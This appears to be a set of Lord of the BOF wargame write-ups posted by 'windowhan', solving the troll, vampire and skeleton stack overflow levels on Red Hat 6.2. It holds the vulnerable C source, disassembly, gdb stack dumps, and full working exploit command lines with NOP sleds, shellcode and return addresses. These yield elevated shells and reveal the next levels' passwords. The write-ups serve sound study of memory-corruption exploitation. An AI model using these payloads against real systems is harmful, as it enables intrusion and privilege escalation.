./`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` $(perl -e 'print "\x90"x44,"\x45\xfb\xff\xbf"')

0xbfffff48

./`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44,"\x38\xff\xff\xbf"'`

(gdb) x/100x 0xbffffa48
0xbffffa48:     0x6d6f682f      0x61762f65      0x7269706d      0x6d742f65
0xbffffa58:     0x2f2e2f70      0x90909090      0x90909090      0x90909090
0xbffffa68:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa78:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa88:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffa98:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffaa8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffab8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffac8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffad8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffae8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffaf8:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb08:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb18:     0x90909090      0x90909090      0x90909090      0xcee28a68
0xbffffb28:     0x0cb16881      0x6a685453      0x68e48a6f      0x63306901
0xbffffb38:     0x74306968      0x59146a69      0x490c0cfe      0xf741fa79
0xbffffb48:     0x00c354e1      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb58:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb68:     0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf      0xbfbfbfbf
0xbffffb78:     0xbfbfbfbf      0x00000000      0x00000000      0x00000000
0xbffffb88:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb98:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffba8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffbb8:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffbc8:     0x00000000      0x00000000      0x00000000      0x00000000



0xbffffef8:      "/home/vampire/tmp/./", '\220' <repeats 180 times>...
0xbfffffc0:      '\220' <repeats 20 times>, "h\212aI\201h±\fSThjo\212ah\001i0chi0tij\024Yþ\f\fIyuA÷aTA"


When I inspected the stack in gdb, the \xff byte was not getting in properly, which is why "stack is still your friend" kept coming up.
I had forgotten this is Red Hat 6.2.

After switching my shell to bash2 and running it, it passed right away.

[vampire@localhost vampire]$ ln -s skeleton `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`
[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44,"\x38\xff\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿8yy¿
bash$ id
uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)
bash$ my-pass
euid = 510
shellcoder
bash$





Posted by windowhan




[troll@localhost troll]$ cat vampire.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - vampire
        - check 0xbfff
*/

#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[])
{
        char buffer[40];

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // here is changed!
        if(argv[1][46] == '\xff')
        {
                printf("but it's not forever\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}

Looking at it, a return address of the form 0xbfff~ is blocked.
It has to be of the form 0xbf??~~ instead.

But the stack's default addresses are in the 0xbfff~~ range.
It looks like I need to grow the stack so the address becomes 0xbf??~~.



0x8048430 <main>:       push   %ebp
0x8048431 <main+1>:     mov    %ebp,%esp
0x8048433 <main+3>:     sub    %esp,40
0x8048436 <main+6>:     cmp    DWORD PTR [%ebp+8],1
0x804843a <main+10>:    jg     0x8048453 <main+35>
0x804843c <main+12>:    push   0x8048520
0x8048441 <main+17>:    call   0x8048350 <printf>
0x8048446 <main+22>:    add    %esp,4
0x8048449 <main+25>:    push   0
0x804844b <main+27>:    call   0x8048360 <exit>
0x8048450 <main+32>:    add    %esp,4
0x8048453 <main+35>:    mov    %eax,DWORD PTR [%ebp+12]
0x8048456 <main+38>:    add    %eax,4
0x8048459 <main+41>:    mov    %edx,DWORD PTR [%eax]
0x804845b <main+43>:    add    %edx,47
0x804845e <main+46>:    cmp    BYTE PTR [%edx],0xbf
0x8048461 <main+49>:    je     0x8048480 <main+80>
0x8048463 <main+51>:    push   0x804852c
0x8048468 <main+56>:    call   0x8048350 <printf>
0x804846d <main+61>:    add    %esp,4
0x8048470 <main+64>:    push   0
0x8048472 <main+66>:    call   0x8048360 <exit>
---Type <return> to continue, or q <return> to quit---
0x8048477 <main+71>:    add    %esp,4
0x804847a <main+74>:    lea    %esi,[%esi]
0x8048480 <main+80>:    mov    %eax,DWORD PTR [%ebp+12]
0x8048483 <main+83>:    add    %eax,4
0x8048486 <main+86>:    mov    %edx,DWORD PTR [%eax]
0x8048488 <main+88>:    add    %edx,46
0x804848b <main+91>:    cmp    BYTE PTR [%edx],0xff
0x804848e <main+94>:    jne    0x80484a7 <main+119>
0x8048490 <main+96>:    push   0x8048549
0x8048495 <main+101>:   call   0x8048350 <printf>
0x804849a <main+106>:   add    %esp,4
0x804849d <main+109>:   push   0
0x804849f <main+111>:   call   0x8048360 <exit>
0x80484a4 <main+116>:   add    %esp,4
0x80484a7 <main+119>:   mov    %eax,DWORD PTR [%ebp+12]
0x80484aa <main+122>:   add    %eax,4
0x80484ad <main+125>:   mov    %edx,DWORD PTR [%eax]
0x80484af <main+127>:   push   %edx
0x80484b0 <main+128>:   lea    %eax,[%ebp-40]
0x80484b3 <main+131>:   push   %eax
0x80484b4 <main+132>:   call   0x8048370 <strcpy>
0x80484b9 <main+137>:   add    %esp,8
0x80484bc <main+140>:   lea    %eax,[%ebp-40]
---Type <return> to continue, or q <return> to quit---
0x80484bf <main+143>:   push   %eax
0x80484c0 <main+144>:   push   0x804855f
0x80484c5 <main+149>:   call   0x8048350 <printf>
0x80484ca <main+154>:   add    %esp,8
0x80484cd <main+157>:   leave
0x80484ce <main+158>:   ret
0x80484cf <main+159>:   nop



And as for argv's position: the longer argv is, the further toward the front (the lower address) it is placed.

----------              //10
argv
... 등등 ebp esp
---------
~~
---------
main frame              //1

Keep in mind this is little endian.
That is why the longer argv gets, the lower the address argv starts at.

r `perl -e 'print "\xbf"x44,"\xb1\x9c\xfe\xbf"'` `perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "a"x90000'`

r `perl -e 'print "\xbf"x44,"\xb1\x9c\xfe\xbf"'` `perl -e 'print "a"x90000'` `perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` 

[troll@localhost troll]$ ./vampire `perl -e 'print "\xbf"x44,"\xb1\x9c\xfe\xbf"'` `perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "a"x90000'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿±œþ¿
bash$ my-pass
euid = 509
music world


0xbffffc20

0xbffe9c44:

0xbffe4e24

Posted by windowhan
[orge@localhost orge]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44,"\xd3\xfb\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Ouy¿
bash$ id
uid=507(orge) gid=507(orge) euid=508(troll) egid=508(troll) groups=507(orge)
bash$ my-pass
euid = 508
aspirin
bash$


Hyung told me to use argv[0], so that's what I did...

At first I copied the binary and had a lot of trouble, but then I made a link instead.
Finally cracked it.


Posted by windowhan